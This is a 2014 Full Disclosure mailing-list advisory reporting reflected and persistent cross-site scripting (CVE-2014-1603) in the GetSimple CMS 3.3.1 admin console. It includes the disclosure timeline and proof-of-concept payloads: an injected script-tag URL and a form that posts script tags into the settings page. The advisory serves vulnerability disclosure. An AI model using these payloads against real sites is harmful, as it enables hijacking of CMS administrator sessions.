[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] [CVE-2014-1603] XSS in GetSimple CMS 3.3.1
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] [CVE-2014-1603] XSS in GetSimple CMS 3.3.1
- From: Pedro Ribeiro <pedrib@xxxxxxxxx>
- Date: Mon, 12 May 2014 22:51:36 +0100
Hi,
Found some persistent and reflected cross site scripting in the Admin
console of GetSimple CMS 3.3.1 and below.
Waited 6 months for a fix but the developer stopped answering my
emails, so decided to release this anyway.
Details attached if you care - also available at
https://raw.githubusercontent.com/pedrib/PoC/master/getsimplecms-3.3.1.txt.
Regards,
Pedro Ribeiro
Agile Information Security
PoC for XSS bugs in the admin console of GetSimple CMS 3.3.1
CVE-2014-1603
by Pedro Ribeiro (pedrib@xxxxxxxxx) from Agile Information Security
Timeline:
04/11/2013 - Found bugs, produced proof of concept.
05/11/2013 - Communicated to the developer, which acknowledged receipt.
10/01/2014 - Politely asked the developer for progress, no response.
17/01/2014 - Received CVE number from MITRE.
20/01/2014 - Communicated CVE number to the developer, no response.
29/01/2014 - Politely asked the developer for progress, no response.
12/05/2014 - Public release.
==============================
Reflected XSS in plugin load page:
http://192.168.56.101/getsimple/admin/load.php?id=anonymous_data¶m=";><script>alert(1)</script>
Persistent XSS in settings page:
<form name="input"
action="http://192.168.56.101/getsimple/admin/settings.php"; method="post">
<input type="text" name="user"
value=""><script>alert(1);</script>">
<input type="text" name="email"
value=""><script>alert(2);</script>">
<input type="text" name="name"
value=""><script>alert(3);</script>">
<input type="hidden" name="submitted" value="Save Settings">
<input type="submit" value="Submit">
</form>
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/